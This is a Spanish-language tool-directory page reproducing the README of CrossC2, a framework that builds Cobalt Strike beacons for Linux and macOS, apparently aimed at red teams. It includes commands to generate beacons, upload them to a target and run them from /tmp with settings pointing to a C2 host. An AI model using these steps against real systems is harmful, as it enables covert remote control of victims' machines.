Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CrossC2 — generar el payload multiplataforma de CobaltStrike | Kitploit
Herramientas/GitHubGitHub/gloxec/crossc2
Frameworks de Pruebas de PenetraciónFrameworks de ExploitsGeneración de PayloadsPost-ExplotaciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubgloxec/crossc2

CrossC2

generar el payload multiplataforma de CobaltStrike

Ver Repositorio
2.6k374hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Marco CrossC2

Linux macOS GitHub issues-closed Release Downloads

CrossC2 Logo

README | Documentación en chino | README_FULL | Documentación completa en chino

Soporte de CobaltStrike

Compatibilidad con la evaluación de seguridad de CobaltStrike en otras plataformas (Linux/MacOS/...), e incluye el soporte de desarrollo del módulo de post-explotación de Unix.

2023-07-31 16.56.51

Uso

  1. Descargar

Descargue CrossC2.cna, genCrossC2, CrossC2Kit, modifique la configuración de CrossC2.cna

  1. Crear listener y copiar clave
  • Cree un listener windows/beacon_https/reverse_https
  • Copie .cobaltstrike.beacon_keys del directorio del teamserver a local
  1. Extensión de funciones
  • Agregue CrossC2Kit_Loader.cna, incluyendo la carga en memoria y otras funciones
  • En la versión cs4.x, faltan la gestión de archivos y la función de lista de procesos; debe usar este Loader para reiniciar
  1. Generar beacon

Use la función de GUI proporcionada por cli o cna para generar beacon por defecto

genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>

ejemplo:

root@kitploit:~
1. lea BEACON_KEY de la ruta actual y genere BEACON del protocolo de tráfico C2Profile predeterminado
    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
     
2. especifique el BEACON de la biblioteca dinámica de protocolo personalizado
    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out

3. especifique el C2Profile que necesita ser analizado automáticamente
    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out

En la documentación se puede encontrar una configuración más avanzada: 📄Referencia

  1. Ejecutar beacon
  • Ejecute el script en línea de un clic generado por el plugin de CrossC2 en el objetivo
  • Después de subir el beacon a la máquina objetivo para una operación con privilegios
  • Configure el directorio de trabajo para beacon y ejecute: export CCPATH=/opt/ && /tmp/c2
  • Especifique temporalmente la biblioteca de protocolo para beacon y ejecute: /tmp/c2 /tmp/c2-rebind.so
  • Establezca temporalmente la configuración de C2 para beacon: export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
  • Configure DEBUG para ver el estado en línea de beacon: export CCDEBUG=1 && /tmp/c2

CrossC2Kit

CrossC2Kit: https://github.com/CrossC2/CrossC2Kit

CrossC2Kit es una expansión de infiltración en la plataforma Unix derivada de CrossC2. Utiliza el motor de script de código abierto Aggressor Script. Se puede usar para crear automatización que simule el proceso de operación del Red Team y expandir el cliente CobaltStrike.

CrossC2Kit hereda las funcionalidades originales de CobaltStrike, por lo que la gramática de desarrollo y escritura aún se refiere a la documentación oficial: https://trial.cobaltstrike.com/aggressor-script/index.html

Pero tiene algunas extensiones de API sobre CrossC2 para controlar el beacon de la plataforma Unix

API: 📄Referencia

Demo: CrossC2_action2

Nota

Solo para uso interno por parte de empresas y organizaciones. Este marco tiene un cierto grado de inestabilidad. No se permite su uso por parte de no profesionales. Nadie debe usarlo con fines ilegales o lucrativos. Además, está prohibido publicar versiones modificadas no autorizadas, o de lo contrario se asumirán responsabilidades legales.

Pendiente

  1. soporte de proxy http (autenticación) y conexión inversa de proxy socks
  2. ¿beacon de nodo? (Tipo de nodo único, puede alojar otro beacon sin depender del teamserver)
  3. soporte de reverse shell en so/dylib en Linux y MacOS, y sus funciones derivadas de inyección de procesos

Agradecimientos

Gracias a @Emma por el logotipo diseñado para CrossC2, que está diseñado en el estilo de las series Armitage y CobaltStrike

Descargar herramienta
CS3.14 (correcciones de errores)CS4.0CS4.X (4.1~4.8)
Rama master✅
Rama cs4.0✅
Rama cs4.1✅
Página de lanzamiento <= v2.1✅
Página de lanzamiento >= v2.2✅